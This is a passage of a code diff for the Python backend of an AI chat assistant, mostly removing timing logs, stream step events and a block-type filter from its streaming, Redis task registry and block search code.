StreamFinish,
StreamFinishStep,
StreamHeartbeat,
StreamStart,
StreamStartStep,
StreamTextDelta,
StreamTextEnd,
StreamTextStart,
@@ -245,16 +243,12 @@ async def _get_system_prompt_template(context: str) -> str:
return DEFAULT_SYSTEM_PROMPT.format(users_information=context)
async def _build_system_prompt(
user_id: str | None, has_conversation_history: bool = False
) -> tuple[str, Any]:
async def _build_system_prompt(user_id: str | None) -> tuple[str, Any]:
"""Build the full system prompt including business understanding if available.
Args:
user_id: The user ID for fetching business understanding.
has_conversation_history: Whether there's existing conversation history.
If True, we don't tell the model to greet/introduce (since they're
already in a conversation).
user_id: The user ID for fetching business understanding
If "default" and this is the user's first session, will use "onboarding" instead.
Returns:
Tuple of (compiled prompt string, business understanding object)
@@ -270,8 +264,6 @@ async def _build_system_prompt(
if understanding:
context = format_understanding_for_prompt(understanding)
elif has_conversation_history:
context = "No prior understanding saved yet. Continue the existing conversation naturally."
else:
context = "This is the first time you are meeting the user. Greet them and introduce them to the platform"
@@ -359,10 +351,6 @@ async def stream_chat_completion(
retry_count: int = 0,
session: ChatSession | None = None,
context: dict[str, str] | None = None, # {url: str, content: str}
_continuation_message_id: (
str | None
) = None, # Internal: reuse message ID for tool call continuations
_task_id: str | None = None, # Internal: task ID for SSE reconnection support
) -> AsyncGenerator[StreamBaseResponse, None]:
"""Main entry point for streaming chat completions with database handling.
@@ -380,47 +368,24 @@ async def stream_chat_completion(
Raises:
NotFoundError: If session_id is invalid
ValueError: If max_context_messages is exceeded
"""
completion_start = time.monotonic()
# Build log metadata for structured logging
log_meta = {"component": "ChatService", "session_id": session_id}
if user_id:
log_meta["user_id"] = user_id
logger.info(
f"[TIMING] stream_chat_completion STARTED, session={session_id}, user={user_id}, "
f"message_len={len(message) if message else 0}, is_user={is_user_message}",
extra={
"json_fields": {
**log_meta,
"message_len": len(message) if message else 0,
"is_user_message": is_user_message,
}
},
f"Streaming chat completion for session {session_id} for message {message} and user id {user_id}. Message is user message: {is_user_message}"
)
# Only fetch from Redis if session not provided (initial call)
if session is None:
fetch_start = time.monotonic()
session = await get_chat_session(session_id, user_id)
fetch_time = (time.monotonic() - fetch_start) * 1000
logger.info(
f"[TIMING] get_chat_session took {fetch_time:.1f}ms, "
f"n_messages={len(session.messages) if session else 0}",
extra={
"json_fields": {
**log_meta,
"duration_ms": fetch_time,
"n_messages": len(session.messages) if session else 0,
}
},
f"Fetched session from Redis: {session.session_id if session else 'None'}, "
f"message_count={len(session.messages) if session else 0}"
)
else:
logger.info(
f"[TIMING] Using provided session, messages={len(session.messages)}",
extra={"json_fields": {**log_meta, "n_messages": len(session.messages)}},
f"Using provided session object: {session.session_id}, "
f"message_count={len(session.messages)}"
)
if not session:
@@ -441,32 +406,23 @@ async def stream_chat_completion(
# Track user message in PostHog
if is_user_message:
posthog_start = time.monotonic()
track_user_message(
user_id=user_id,
session_id=session_id,
message_length=len(message),
)
posthog_time = (time.monotonic() - posthog_start) * 1000
logger.info(
f"[TIMING] track_user_message took {posthog_time:.1f}ms",
extra={"json_fields": {**log_meta, "duration_ms": posthog_time}},
)
upsert_start = time.monotonic()
session = await upsert_chat_session(session)
upsert_time = (time.monotonic() - upsert_start) * 1000
logger.info(
f"[TIMING] upsert_chat_session took {upsert_time:.1f}ms",
extra={"json_fields": {**log_meta, "duration_ms": upsert_time}},
f"Upserting session: {session.session_id} with user id {session.user_id}, "
f"message_count={len(session.messages)}"
)
session = await upsert_chat_session(session)
assert session, "Session not found"
# Generate title for new sessions on first user message (non-blocking)
# Check: is_user_message, no title yet, and this is the first user message
user_messages = [m for m in session.messages if m.role == "user"]
first_user_msg = message or (user_messages[0].content if user_messages else None)
if is_user_message and first_user_msg and not session.title:
if is_user_message and message and not session.title:
user_messages = [m for m in session.messages if m.role == "user"]
if len(user_messages) == 1:
# First user message - generate title in background
import asyncio
@@ -474,7 +430,7 @@ async def stream_chat_completion(
# Capture only the values we need (not the session object) to avoid
# stale data issues when the main flow modifies the session
captured_session_id = session_id
captured_message = first_user_msg
captured_message = message
captured_user_id = user_id
async def _update_title():
@@ -498,13 +454,7 @@ async def stream_chat_completion(
asyncio.create_task(_update_title())
# Build system prompt with business understanding
prompt_start = time.monotonic()
system_prompt, understanding = await _build_system_prompt(user_id)
prompt_time = (time.monotonic() - prompt_start) * 1000
logger.info(
f"[TIMING] _build_system_prompt took {prompt_time:.1f}ms",
extra={"json_fields": {**log_meta, "duration_ms": prompt_time}},
)
# Initialize variables for streaming
assistant_response = ChatMessage(
@@ -529,27 +479,13 @@ async def stream_chat_completion(
# Generate unique IDs for AI SDK protocol
import uuid as uuid_module
is_continuation = _continuation_message_id is not None
message_id = _continuation_message_id or str(uuid_module.uuid4())
message_id = str(uuid_module.uuid4())
text_block_id = str(uuid_module.uuid4())
# Only yield message start for the initial call, not for continuations.
setup_time = (time.monotonic() - completion_start) * 1000
logger.info(
f"[TIMING] Setup complete, yielding StreamStart at {setup_time:.1f}ms",
extra={"json_fields": {**log_meta, "setup_time_ms": setup_time}},
)
if not is_continuation:
yield StreamStart(messageId=message_id, taskId=_task_id)
# Emit start-step before each LLM call (AI SDK uses this to add step boundaries)
yield StreamStartStep()
# Yield message start
yield StreamStart(messageId=message_id)
try:
logger.info(
"[TIMING] Calling _stream_chat_chunks",
extra={"json_fields": log_meta},
)
async for chunk in _stream_chat_chunks(
session=session,
tools=tools,
@@ -649,10 +585,6 @@ async def stream_chat_completion(
)
yield chunk
elif isinstance(chunk, StreamFinish):
if has_done_tool_call:
# Tool calls happened — close the step but don't send message-level finish.
# The continuation will open a new step, and finish will come at the end.
yield StreamFinishStep()
if not has_done_tool_call:
# Emit text-end before finish if we received text but haven't closed it
if has_received_text and not text_streaming_ended:
@@ -684,8 +616,6 @@ async def stream_chat_completion(
has_saved_assistant_message = True
has_yielded_end = True
# Emit finish-step before finish (resets AI SDK text/reasoning state)
yield StreamFinishStep()
yield chunk
elif isinstance(chunk, StreamError):
has_yielded_error = True
@@ -735,10 +665,6 @@ async def stream_chat_completion(
logger.info(
f"Retryable error encountered. Attempt {retry_count + 1}/{config.max_retries}"
)
# Close the current step before retrying so the recursive call's
# StreamStartStep doesn't produce unbalanced step events.
if not has_yielded_end:
yield StreamFinishStep()
should_retry = True
else:
# Non-retryable error or max retries exceeded
@@ -774,7 +700,6 @@ async def stream_chat_completion(
error_response = StreamError(errorText=error_message)
yield error_response
if not has_yielded_end:
yield StreamFinishStep()
yield StreamFinish()
return
@@ -789,8 +714,6 @@ async def stream_chat_completion(
retry_count=retry_count + 1,
session=session,
context=context,
_continuation_message_id=message_id, # Reuse message ID since start was already sent
_task_id=_task_id,
):
yield chunk
return # Exit after retry to avoid double-saving in finally block
@@ -860,8 +783,6 @@ async def stream_chat_completion(
session=session, # Pass session object to avoid Redis refetch
context=context,
tool_call_response=str(tool_response_messages),
_continuation_message_id=message_id, # Reuse message ID to avoid duplicates
_task_id=_task_id,
):
yield chunk
@@ -972,21 +893,9 @@ async def _stream_chat_chunks(
SSE formatted JSON response objects
"""
import time as time_module
stream_chunks_start = time_module.perf_counter()
model = config.model
# Build log metadata for structured logging
log_meta = {"component": "ChatService", "session_id": session.session_id}
if session.user_id:
log_meta["user_id"] = session.user_id
logger.info(
f"[TIMING] _stream_chat_chunks STARTED, session={session.session_id}, "
f"user={session.user_id}, n_messages={len(session.messages)}",
extra={"json_fields": {**log_meta, "n_messages": len(session.messages)}},
)
logger.info("Starting pure chat stream")
messages = session.to_openai_messages()
if system_prompt:
@@ -997,18 +906,12 @@ async def _stream_chat_chunks(
messages = [system_message] + messages
# Apply context window management
context_start = time_module.perf_counter()
context_result = await _manage_context_window(
messages=messages,
model=model,
api_key=config.api_key,
base_url=config.base_url,
)
context_time = (time_module.perf_counter() - context_start) * 1000
logger.info(
f"[TIMING] _manage_context_window took {context_time:.1f}ms",
extra={"json_fields": {**log_meta, "duration_ms": context_time}},
)
if context_result.error:
if "System prompt dropped" in context_result.error:
@@ -1043,19 +946,9 @@ async def _stream_chat_chunks(
while retry_count <= MAX_RETRIES:
try:
elapsed = (time_module.perf_counter() - stream_chunks_start) * 1000
retry_info = (
f" (retry {retry_count}/{MAX_RETRIES})" if retry_count > 0 else ""
)
logger.info(
f"[TIMING] Creating OpenAI stream at {elapsed:.1f}ms{retry_info}",
extra={
"json_fields": {
**log_meta,
"elapsed_ms": elapsed,
"retry_count": retry_count,
}
},
f"Creating OpenAI chat completion stream..."
f"{f' (retry {retry_count}/{MAX_RETRIES})' if retry_count > 0 else ''}"
)
# Build extra_body for OpenRouter tracing and PostHog analytics
@@ -1072,11 +965,6 @@ async def _stream_chat_chunks(
:128
] # OpenRouter limit
# Enable adaptive thinking for Anthropic models via OpenRouter
if config.thinking_enabled and "anthropic" in model.lower():
extra_body["reasoning"] = {"enabled": True}
api_call_start = time_module.perf_counter()
stream = await client.chat.completions.create(
model=model,
messages=cast(list[ChatCompletionMessageParam], messages),
@@ -1086,11 +974,6 @@ async def _stream_chat_chunks(
stream_options=ChatCompletionStreamOptionsParam(include_usage=True),
extra_body=extra_body,
)
api_init_time = (time_module.perf_counter() - api_call_start) * 1000
logger.info(
f"[TIMING] OpenAI stream object returned in {api_init_time:.1f}ms",
extra={"json_fields": {**log_meta, "duration_ms": api_init_time}},
)
# Variables to accumulate tool calls
tool_calls: list[dict[str, Any]] = []
@@ -1101,13 +984,10 @@ async def _stream_chat_chunks(
# Track if we've started the text block
text_started = False
first_content_chunk = True
chunk_count = 0
# Process the stream
chunk: ChatCompletionChunk
async for chunk in stream:
chunk_count += 1
if chunk.usage:
yield StreamUsage(
promptTokens=chunk.usage.prompt_tokens,
@@ -1130,23 +1010,6 @@ async def _stream_chat_chunks(
if not text_started and text_block_id:
yield StreamTextStart(id=text_block_id)
text_started = True
# Log timing for first content chunk
if first_content_chunk:
first_content_chunk = False
ttfc = (
time_module.perf_counter() - api_call_start
) * 1000
logger.info(
f"[TIMING] FIRST CONTENT CHUNK at {ttfc:.1f}ms "
f"(since API call), n_chunks={chunk_count}",
extra={
"json_fields": {
**log_meta,
"time_to_first_chunk_ms": ttfc,
"n_chunks": chunk_count,
}
},
)
# Stream the text delta
text_response = StreamTextDelta(
id=text_block_id or "",
@@ -1203,21 +1066,7 @@ async def _stream_chat_chunks(
toolName=tool_calls[idx]["function"]["name"],
)
emitted_start_for_idx.add(idx)
stream_duration = time_module.perf_counter() - api_call_start
logger.info(
f"[TIMING] OpenAI stream COMPLETE, finish_reason={finish_reason}, "
f"duration={stream_duration:.2f}s, "
f"n_chunks={chunk_count}, n_tool_calls={len(tool_calls)}",
extra={
"json_fields": {
**log_meta,
"stream_duration_ms": stream_duration * 1000,
"finish_reason": finish_reason,
"n_chunks": chunk_count,
"n_tool_calls": len(tool_calls),
}
},
)
logger.info(f"Stream complete. Finish reason: {finish_reason}")
# Yield all accumulated tool calls after the stream is complete
# This ensures all tool call arguments have been fully received
@@ -1237,12 +1086,6 @@ async def _stream_chat_chunks(
# Re-raise to trigger retry logic in the parent function
raise
total_time = (time_module.perf_counter() - stream_chunks_start) * 1000
logger.info(
f"[TIMING] _stream_chat_chunks COMPLETED in {total_time / 1000:.1f}s; "
f"session={session.session_id}, user={session.user_id}",
extra={"json_fields": {**log_meta, "total_time_ms": total_time}},
)
yield StreamFinish()
return
except Exception as e:
@@ -1722,7 +1565,6 @@ async def _execute_long_running_tool_with_streaming(
task_id,
StreamError(errorText=str(e)),
)
await stream_registry.publish_chunk(task_id, StreamFinishStep())
await stream_registry.publish_chunk(task_id, StreamFinish())
await _update_pending_operation(
@@ -1839,10 +1681,6 @@ async def _generate_llm_continuation(
if session_id:
extra_body["session_id"] = session_id[:128]
# Enable adaptive thinking for Anthropic models via OpenRouter
if config.thinking_enabled and "anthropic" in config.model.lower():
extra_body["reasoning"] = {"enabled": True}
retry_count = 0
last_error: Exception | None = None
response = None
@@ -1973,10 +1811,6 @@ async def _generate_llm_continuation_with_streaming(
if session_id:
extra_body["session_id"] = session_id[:128]
# Enable adaptive thinking for Anthropic models via OpenRouter
if config.thinking_enabled and "anthropic" in config.model.lower():
extra_body["reasoning"] = {"enabled": True}
# Make streaming LLM call (no tools - just text response)
from typing import cast
@@ -1988,7 +1822,6 @@ async def _generate_llm_continuation_with_streaming(
# Publish start event
await stream_registry.publish_chunk(task_id, StreamStart(messageId=message_id))
await stream_registry.publish_chunk(task_id, StreamStartStep())
await stream_registry.publish_chunk(task_id, StreamTextStart(id=text_block_id))
# Stream the response
@@ -2012,7 +1845,6 @@ async def _generate_llm_continuation_with_streaming(
# Publish end events
await stream_registry.publish_chunk(task_id, StreamTextEnd(id=text_block_id))
await stream_registry.publish_chunk(task_id, StreamFinishStep())
if assistant_content:
# Reload session from DB to avoid race condition with user messages
@@ -2054,5 +1886,4 @@ async def _generate_llm_continuation_with_streaming(
task_id,
StreamError(errorText=f"Failed to generate response: {e}"),
)
await stream_registry.publish_chunk(task_id, StreamFinishStep())
await stream_registry.publish_chunk(task_id, StreamFinish())

View File

@@ -104,24 +104,6 @@ async def create_task(
Returns:
The created ActiveTask instance (metadata only)
"""
import time
start_time = time.perf_counter()
# Build log metadata for structured logging
log_meta = {
"component": "StreamRegistry",
"task_id": task_id,
"session_id": session_id,
}
if user_id:
log_meta["user_id"] = user_id
logger.info(
f"[TIMING] create_task STARTED, task={task_id}, session={session_id}, user={user_id}",
extra={"json_fields": log_meta},
)
task = ActiveTask(
task_id=task_id,
session_id=session_id,
@@ -132,18 +114,10 @@ async def create_task(
)
# Store metadata in Redis
redis_start = time.perf_counter()
redis = await get_redis_async()
redis_time = (time.perf_counter() - redis_start) * 1000
logger.info(
f"[TIMING] get_redis_async took {redis_time:.1f}ms",
extra={"json_fields": {**log_meta, "duration_ms": redis_time}},
)
meta_key = _get_task_meta_key(task_id)
op_key = _get_operation_mapping_key(operation_id)
hset_start = time.perf_counter()
await redis.hset( # type: ignore[misc]
meta_key,
mapping={
@@ -157,22 +131,12 @@ async def create_task(
"created_at": task.created_at.isoformat(),
},
)
hset_time = (time.perf_counter() - hset_start) * 1000
logger.info(
f"[TIMING] redis.hset took {hset_time:.1f}ms",
extra={"json_fields": {**log_meta, "duration_ms": hset_time}},
)
await redis.expire(meta_key, config.stream_ttl)
# Create operation_id -> task_id mapping for webhook lookups
await redis.set(op_key, task_id, ex=config.stream_ttl)
total_time = (time.perf_counter() - start_time) * 1000
logger.info(
f"[TIMING] create_task COMPLETED in {total_time:.1f}ms; task={task_id}, session={session_id}",
extra={"json_fields": {**log_meta, "total_time_ms": total_time}},
)
logger.debug(f"Created task {task_id} for session {session_id}")
return task
@@ -192,60 +156,26 @@ async def publish_chunk(
Returns:
The Redis Stream message ID
"""
import time
start_time = time.perf_counter()
chunk_type = type(chunk).__name__
chunk_json = chunk.model_dump_json()
message_id = "0-0"
# Build log metadata
log_meta = {
"component": "StreamRegistry",
"task_id": task_id,
"chunk_type": chunk_type,
}
try:
redis = await get_redis_async()
stream_key = _get_task_stream_key(task_id)
# Write to Redis Stream for persistence and real-time delivery
xadd_start = time.perf_counter()
raw_id = await redis.xadd(
stream_key,
{"data": chunk_json},
maxlen=config.stream_max_length,
)
xadd_time = (time.perf_counter() - xadd_start) * 1000
message_id = raw_id if isinstance(raw_id, str) else raw_id.decode()
# Set TTL on stream to match task metadata TTL
await redis.expire(stream_key, config.stream_ttl)
total_time = (time.perf_counter() - start_time) * 1000
# Only log timing for significant chunks or slow operations
if (
chunk_type
in ("StreamStart", "StreamFinish", "StreamTextStart", "StreamTextEnd")
or total_time > 50
):
logger.info(
f"[TIMING] publish_chunk {chunk_type} in {total_time:.1f}ms (xadd={xadd_time:.1f}ms)",
extra={
"json_fields": {
**log_meta,
"total_time_ms": total_time,
"xadd_time_ms": xadd_time,
"message_id": message_id,
}
},
)
except Exception as e:
elapsed = (time.perf_counter() - start_time) * 1000
logger.error(
f"[TIMING] Failed to publish chunk {chunk_type} after {elapsed:.1f}ms: {e}",
extra={"json_fields": {**log_meta, "elapsed_ms": elapsed, "error": str(e)}},
f"Failed to publish chunk for task {task_id}: {e}",
exc_info=True,
)
@@ -270,61 +200,24 @@ async def subscribe_to_task(
An asyncio Queue that will receive stream chunks, or None if task not found
or user doesn't have access
"""
import time
start_time = time.perf_counter()
# Build log metadata
log_meta = {"component": "StreamRegistry", "task_id": task_id}
if user_id:
log_meta["user_id"] = user_id
logger.info(
f"[TIMING] subscribe_to_task STARTED, task={task_id}, user={user_id}, last_msg={last_message_id}",
extra={"json_fields": {**log_meta, "last_message_id": last_message_id}},
)
redis_start = time.perf_counter()
redis = await get_redis_async()
meta_key = _get_task_meta_key(task_id)
meta: dict[Any, Any] = await redis.hgetall(meta_key) # type: ignore[misc]
hgetall_time = (time.perf_counter() - redis_start) * 1000
logger.info(
f"[TIMING] Redis hgetall took {hgetall_time:.1f}ms",
extra={"json_fields": {**log_meta, "duration_ms": hgetall_time}},
)
if not meta:
elapsed = (time.perf_counter() - start_time) * 1000
logger.info(
f"[TIMING] Task not found in Redis after {elapsed:.1f}ms",
extra={
"json_fields": {
**log_meta,
"elapsed_ms": elapsed,
"reason": "task_not_found",
}
},
)
logger.debug(f"Task {task_id} not found in Redis")
return None
# Note: Redis client uses decode_responses=True, so keys are strings
task_status = meta.get("status", "")
task_user_id = meta.get("user_id", "") or None
log_meta["session_id"] = meta.get("session_id", "")
# Validate ownership - if task has an owner, requester must match
if task_user_id:
if user_id != task_user_id:
logger.warning(
f"[TIMING] Access denied: user {user_id} tried to access task owned by {task_user_id}",
extra={
"json_fields": {
**log_meta,
"task_owner": task_user_id,
"reason": "access_denied",
}
},
f"User {user_id} denied access to task {task_id} "
f"owned by {task_user_id}"
)
return None
@@ -332,19 +225,7 @@ async def subscribe_to_task(
stream_key = _get_task_stream_key(task_id)
# Step 1: Replay messages from Redis Stream
xread_start = time.perf_counter()
messages = await redis.xread({stream_key: last_message_id}, block=0, count=1000)
xread_time = (time.perf_counter() - xread_start) * 1000
logger.info(
f"[TIMING] Redis xread (replay) took {xread_time:.1f}ms, status={task_status}",
extra={
"json_fields": {
**log_meta,
"duration_ms": xread_time,
"task_status": task_status,
}
},
)
replayed_count = 0
replay_last_id = last_message_id
@@ -363,48 +244,19 @@ async def subscribe_to_task(
except Exception as e:
logger.warning(f"Failed to replay message: {e}")
logger.info(
f"[TIMING] Replayed {replayed_count} messages, last_id={replay_last_id}",
extra={
"json_fields": {
**log_meta,
"n_messages_replayed": replayed_count,
"replay_last_id": replay_last_id,
}
},
)
logger.debug(f"Task {task_id}: replayed {replayed_count} messages")
# Step 2: If task is still running, start stream listener for live updates
if task_status == "running":
logger.info(
"[TIMING] Task still running, starting _stream_listener",
extra={"json_fields": {**log_meta, "task_status": task_status}},
)
listener_task = asyncio.create_task(
_stream_listener(task_id, subscriber_queue, replay_last_id, log_meta)
_stream_listener(task_id, subscriber_queue, replay_last_id)
)
# Track listener task for cleanup on unsubscribe
_listener_tasks[id(subscriber_queue)] = (task_id, listener_task)
else:
# Task is completed/failed - add finish marker
logger.info(
f"[TIMING] Task already {task_status}, adding StreamFinish",
extra={"json_fields": {**log_meta, "task_status": task_status}},
)
await subscriber_queue.put(StreamFinish())
total_time = (time.perf_counter() - start_time) * 1000
logger.info(
f"[TIMING] subscribe_to_task COMPLETED in {total_time:.1f}ms; task={task_id}, "
f"n_messages_replayed={replayed_count}",
extra={
"json_fields": {
**log_meta,
"total_time_ms": total_time,
"n_messages_replayed": replayed_count,
}
},
)
return subscriber_queue
@@ -412,7 +264,6 @@ async def _stream_listener(
task_id: str,
subscriber_queue: asyncio.Queue[StreamBaseResponse],
last_replayed_id: str,
log_meta: dict | None = None,
) -> None:
"""Listen to Redis Stream for new messages using blocking XREAD.
@@ -423,27 +274,10 @@ async def _stream_listener(
task_id: Task ID to listen for
subscriber_queue: Queue to deliver messages to
last_replayed_id: Last message ID from replay (continue from here)
log_meta: Structured logging metadata
"""
import time
start_time = time.perf_counter()
# Use provided log_meta or build minimal one
if log_meta is None:
log_meta = {"component": "StreamRegistry", "task_id": task_id}
logger.info(
f"[TIMING] _stream_listener STARTED, task={task_id}, last_id={last_replayed_id}",
extra={"json_fields": {**log_meta, "last_replayed_id": last_replayed_id}},
)
queue_id = id(subscriber_queue)
# Track the last successfully delivered message ID for recovery hints
last_delivered_id = last_replayed_id
messages_delivered = 0
first_message_time = None
xread_count = 0
try:
redis = await get_redis_async()
@@ -453,39 +287,9 @@ async def _stream_listener(
while True:
# Block for up to 30 seconds waiting for new messages
# This allows periodic checking if task is still running
xread_start = time.perf_counter()
xread_count += 1
messages = await redis.xread(
{stream_key: current_id}, block=30000, count=100
)
xread_time = (time.perf_counter() - xread_start) * 1000
if messages:
msg_count = sum(len(msgs) for _, msgs in messages)
logger.info(
f"[TIMING] xread #{xread_count} returned {msg_count} messages in {xread_time:.1f}ms",
extra={
"json_fields": {
**log_meta,
"xread_count": xread_count,
"n_messages": msg_count,
"duration_ms": xread_time,
}
},
)
elif xread_time > 1000:
# Only log timeouts (30s blocking)
logger.info(
f"[TIMING] xread #{xread_count} timeout after {xread_time:.1f}ms",
extra={
"json_fields": {
**log_meta,
"xread_count": xread_count,
"duration_ms": xread_time,
"reason": "timeout",
}
},
)
if not messages:
# Timeout - check if task is still running
@@ -522,30 +326,10 @@ async def _stream_listener(
)
# Update last delivered ID on successful delivery
last_delivered_id = current_id
messages_delivered += 1
if first_message_time is None:
first_message_time = time.perf_counter()
elapsed = (first_message_time - start_time) * 1000
logger.info(
f"[TIMING] FIRST live message at {elapsed:.1f}ms, type={type(chunk).__name__}",
extra={
"json_fields": {
**log_meta,
"elapsed_ms": elapsed,
"chunk_type": type(chunk).__name__,
}
},
)
except asyncio.TimeoutError:
logger.warning(
f"[TIMING] Subscriber queue full, delivery timed out after {QUEUE_PUT_TIMEOUT}s",
extra={
"json_fields": {
**log_meta,
"timeout_s": QUEUE_PUT_TIMEOUT,
"reason": "queue_full",
}
},
f"Subscriber queue full for task {task_id}, "
f"message delivery timed out after {QUEUE_PUT_TIMEOUT}s"
)
# Send overflow error with recovery info
try:
@@ -567,44 +351,15 @@ async def _stream_listener(
# Stop listening on finish
if isinstance(chunk, StreamFinish):
total_time = (time.perf_counter() - start_time) * 1000
logger.info(
f"[TIMING] StreamFinish received in {total_time/1000:.1f}s; delivered={messages_delivered}",
extra={
"json_fields": {
**log_meta,
"total_time_ms": total_time,
"messages_delivered": messages_delivered,
}
},
)
return
except Exception as e:
logger.warning(
f"Error processing stream message: {e}",
extra={"json_fields": {**log_meta, "error": str(e)}},
)
logger.warning(f"Error processing stream message: {e}")
except asyncio.CancelledError:
elapsed = (time.perf_counter() - start_time) * 1000
logger.info(
f"[TIMING] _stream_listener CANCELLED after {elapsed:.1f}ms, delivered={messages_delivered}",
extra={
"json_fields": {
**log_meta,
"elapsed_ms": elapsed,
"messages_delivered": messages_delivered,
"reason": "cancelled",
}
},
)
logger.debug(f"Stream listener cancelled for task {task_id}")
raise # Re-raise to propagate cancellation
except Exception as e:
elapsed = (time.perf_counter() - start_time) * 1000
logger.error(
f"[TIMING] _stream_listener ERROR after {elapsed:.1f}ms: {e}",
extra={"json_fields": {**log_meta, "elapsed_ms": elapsed, "error": str(e)}},
)
logger.error(f"Stream listener error for task {task_id}: {e}")
# On error, send finish to unblock subscriber
try:
await asyncio.wait_for(
@@ -613,24 +368,10 @@ async def _stream_listener(
)
except (asyncio.TimeoutError, asyncio.QueueFull):
logger.warning(
"Could not deliver finish event after error",
extra={"json_fields": log_meta},
f"Could not deliver finish event for task {task_id} after error"
)
finally:
# Clean up listener task mapping on exit
total_time = (time.perf_counter() - start_time) * 1000
logger.info(
f"[TIMING] _stream_listener FINISHED in {total_time/1000:.1f}s; task={task_id}, "
f"delivered={messages_delivered}, xread_count={xread_count}",
extra={
"json_fields": {
**log_meta,
"total_time_ms": total_time,
"messages_delivered": messages_delivered,
"xread_count": xread_count,
}
},
)
_listener_tasks.pop(queue_id, None)
@@ -814,28 +555,6 @@ async def get_active_task_for_session(
if task_user_id and user_id != task_user_id:
continue
# Auto-expire stale tasks that exceeded stream_timeout
created_at_str = meta.get("created_at", "")
if created_at_str:
try:
created_at = datetime.fromisoformat(created_at_str)
age_seconds = (
datetime.now(timezone.utc) - created_at
).total_seconds()
if age_seconds > config.stream_timeout:
logger.warning(
f"[TASK_LOOKUP] Auto-expiring stale task {task_id[:8]}... "
f"(age={age_seconds:.0f}s > timeout={config.stream_timeout}s)"
)
await mark_task_completed(task_id, "failed")
continue
except (ValueError, TypeError):
pass
logger.info(
f"[TASK_LOOKUP] Found running task {task_id[:8]}... for session {session_id[:8]}..."
)
# Get the last message ID from Redis Stream
stream_key = _get_task_stream_key(task_id)
last_id = "0-0"
@@ -879,10 +598,8 @@ def _reconstruct_chunk(chunk_data: dict) -> StreamBaseResponse | None:
ResponseType,
StreamError,
StreamFinish,
StreamFinishStep,
StreamHeartbeat,
StreamStart,
StreamStartStep,
StreamTextDelta,
StreamTextEnd,
StreamTextStart,
@@ -896,8 +613,6 @@ def _reconstruct_chunk(chunk_data: dict) -> StreamBaseResponse | None:
type_to_class: dict[str, type[StreamBaseResponse]] = {
ResponseType.START.value: StreamStart,
ResponseType.FINISH.value: StreamFinish,
ResponseType.START_STEP.value: StreamStartStep,
ResponseType.FINISH_STEP.value: StreamFinishStep,
ResponseType.TEXT_START.value: StreamTextStart,
ResponseType.TEXT_DELTA.value: StreamTextDelta,
ResponseType.TEXT_END.value: StreamTextEnd,

View File

@@ -13,32 +13,10 @@ from backend.api.features.chat.tools.models import (
NoResultsResponse,
)
from backend.api.features.store.hybrid_search import unified_hybrid_search
from backend.data.block import BlockType, get_block
from backend.data.block import get_block
logger = logging.getLogger(__name__)
_TARGET_RESULTS = 10
# Over-fetch to compensate for post-hoc filtering of graph-only blocks.
# 40 is 2x current removed; speed of query 10 vs 40 is minimial
_OVERFETCH_PAGE_SIZE = 40
# Block types that only work within graphs and cannot run standalone in CoPilot.
COPILOT_EXCLUDED_BLOCK_TYPES = {
BlockType.INPUT, # Graph interface definition - data enters via chat, not graph inputs
BlockType.OUTPUT, # Graph interface definition - data exits via chat, not graph outputs
BlockType.WEBHOOK, # Wait for external events - would hang forever in CoPilot
BlockType.WEBHOOK_MANUAL, # Same as WEBHOOK
BlockType.NOTE, # Visual annotation only - no runtime behavior
BlockType.HUMAN_IN_THE_LOOP, # Pauses for human approval - CoPilot IS human-in-the-loop
BlockType.AGENT, # AgentExecutorBlock requires execution_context - use run_agent tool
}
# Specific block IDs excluded from CoPilot (STANDARD type but still require graph context)
COPILOT_EXCLUDED_BLOCK_IDS = {
# SmartDecisionMakerBlock - dynamically discovers downstream blocks via graph topology
"3b191d9f-356f-482d-8238-ba04b6d18381",
}
class FindBlockTool(BaseTool):
"""Tool for searching available blocks."""
@@ -110,7 +88,7 @@ class FindBlockTool(BaseTool):
query=query,
content_types=[ContentType.BLOCK],
page=1,
page_size=_OVERFETCH_PAGE_SIZE,
page_size=10,
)
if not results:
@@ -130,90 +108,60 @@ class FindBlockTool(BaseTool):
block = get_block(block_id)
# Skip disabled blocks
if not block or block.disabled:
continue
if block and not block.disabled:
# Get input/output schemas
input_schema = {}
output_schema = {}
try:
input_schema = block.input_schema.jsonschema()
except Exception:
pass
try:
output_schema = block.output_schema.jsonschema()
except Exception:
pass
# Skip blocks excluded from CoPilot (graph-only blocks)
if (
block.block_type in COPILOT_EXCLUDED_BLOCK_TYPES
or block.id in COPILOT_EXCLUDED_BLOCK_IDS
):
continue
# Get categories from block instance
categories = []
if hasattr(block, "categories") and block.categories:
categories = [cat.value for cat in block.categories]
# Get input/output schemas
input_schema = {}
output_schema = {}
try:
input_schema = block.input_schema.jsonschema()
except Exception as e:
logger.debug(
"Failed to generate input schema for block %s: %s",
block_id,
e,
)
try:
output_schema = block.output_schema.jsonschema()
except Exception as e:
logger.debug(
"Failed to generate output schema for block %s: %s",
block_id,
e,
)
# Get categories from block instance
categories = []
if hasattr(block, "categories") and block.categories:
categories = [cat.value for cat in block.categories]
# Extract required inputs for easier use
required_inputs: list[BlockInputFieldInfo] = []
if input_schema:
properties = input_schema.get("properties", {})
required_fields = set(input_schema.get("required", []))
# Get credential field names to exclude from required inputs
credentials_fields = set(
block.input_schema.get_credentials_fields().keys()
)
for field_name, field_schema in properties.items():
# Skip credential fields - they're handled separately
if field_name in credentials_fields:
continue
required_inputs.append(
BlockInputFieldInfo(
name=field_name,
type=field_schema.get("type", "string"),
description=field_schema.get("description", ""),
required=field_name in required_fields,
default=field_schema.get("default"),
)
# Extract required inputs for easier use
required_inputs: list[BlockInputFieldInfo] = []
if input_schema:
properties = input_schema.get("properties", {})
required_fields = set(input_schema.get("required", []))
# Get credential field names to exclude from required inputs
credentials_fields = set(
block.input_schema.get_credentials_fields().keys()
)
blocks.append(
BlockInfoSummary(
id=block_id,
name=block.name,
description=block.description or "",
categories=categories,
input_schema=input_schema,
output_schema=output_schema,
required_inputs=required_inputs,
for field_name, field_schema in properties.items():
# Skip credential fields - they're handled separately
if field_name in credentials_fields:
continue
required_inputs.append(
BlockInputFieldInfo(
name=field_name,
type=field_schema.get("type", "string"),
description=field_schema.get("description", ""),
required=field_name in required_fields,
default=field_schema.get("default"),
)
)
blocks.append(
BlockInfoSummary(
id=block_id,
name=block.name,
description=block.description or "",
categories=categories,
input_schema=input_schema,
output_schema=output_schema,
required_inputs=required_inputs,
)
)
)
if len(blocks) >= _TARGET_RESULTS:
break
if blocks and len(blocks) < _TARGET_RESULTS:
logger.debug(
"find_block returned %d/%d results for query '%s' "
"(filtered %d excluded/disabled blocks)",
len(blocks),
_TARGET_RESULTS,
query,
len(results) - len(blocks),
)
